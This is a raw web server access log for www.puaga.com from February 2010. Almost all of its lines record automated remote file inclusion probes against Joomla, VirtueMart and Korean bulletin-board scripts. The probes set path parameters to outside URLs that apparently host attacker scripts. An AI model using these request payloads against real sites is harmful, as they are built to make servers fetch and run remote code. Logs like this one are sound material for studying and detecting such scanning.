24.23.78.174 - - [11/Feb/2010:04:13:46 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:04:14:00 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:04:14:04 -0800] "GET /logs/access_100107.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:04:14:12 -0800] "GET /logs/access_100107.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:15:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:15:15 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:15:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:15:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:15:25 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:15:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:15:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:15:33 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:15:42 -0800] "GET /logs/access_100127.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:15:44 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:15:58 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:16:02 -0800] "GET /logs/access_100111.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:16:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:16:12 -0800] "GET /logs/access_100127.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:16:12 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:16:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:16:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:16:16 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:16:22 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:16:23 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:16:27 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:16:28 -0800] "GET /logs/access_100111.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:16:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:16:33 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:16:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:16:40 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:16:54 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:16:54 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:16:55 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:04:17:17 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:04:17:18 -0800] "GET /orange_g/forum/viewtopic.php?p=27564 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
69.90.47.134 - - [11/Feb/2010:04:17:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [11/Feb/2010:04:17:20 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [11/Feb/2010:04:17:20 -0800] "GET /logs/access_100126.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:04:17:24 -0800] "GET /orange_g/forum/viewtopic.php?p=26237 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
125.141.91.138 - - [11/Feb/2010:04:17:28 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:17:44 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:18:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:18:25 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:18:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:18:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:18:35 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:18:35 -0800] "GET /logs/access_100127.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:18:49 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:18:55 -0800] "GET /logs/access_100111.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:18:56 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:18:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:18:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:19:04 -0800] "GET /logs/access_100104.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:19:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:19:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:19:24 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [11/Feb/2010:04:19:28 -0800] "GET /logs/access_100111.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:19:36 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:19:47 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:22:32 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:22:32 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:22:32 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:04:22:36 -0800] "GET /logs/access_100203.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:04:22:37 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:04:22:38 -0800] "GET /logs/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:22:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:22:59 -0800] "GET /logs/access_100127.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:22:59 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [11/Feb/2010:04:23:20 -0800] "GET /logs/access_100111.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:23:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:23:30 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:23:30 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:04:24:33 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:04:24:34 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:04:24:34 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:04:25:35 -0800] "GET /logs//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:04:25:35 -0800] "GET /bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:04:25:45 -0800] "GET /logs/access_100121.log%20%20//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:25:48 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:25:48 -0800] "GET /logs/access_100129.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:25:48 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:26:06 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:26:06 -0800] "GET /logs/access_100129.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:26:08 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:26:09 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:26:31 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [11/Feb/2010:04:27:15 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.refletdestyle.fr//plugins/search/res.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
213.239.230.130 - - [11/Feb/2010:04:27:16 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.refletdestyle.fr//plugins/search/res.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:28:18 -0800] "GET /19%20?php=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:28:18 -0800] "GET /logs/19%20?php=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:28:18 -0800] "GET /logs/access_100129.log/19%20?php=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:28:39 -0800] "GET /logs/access_100201.log/19%20?php=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:02 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:02 -0800] "GET /logs/access_100118.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:17 -0800] "GET /logs/access_100118.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:18 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:18 -0800] "GET /logs/access_100118.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:22 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:32 -0800] "GET /logs/access_100127.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:38 -0800] "GET /logs/access_100127.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:31:47 -0800] "GET /logs/access_100127.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:31:54 -0800] "GET /logs/access_100203.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:32:03 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:05 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:05 -0800] "GET /logs/access_100107.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
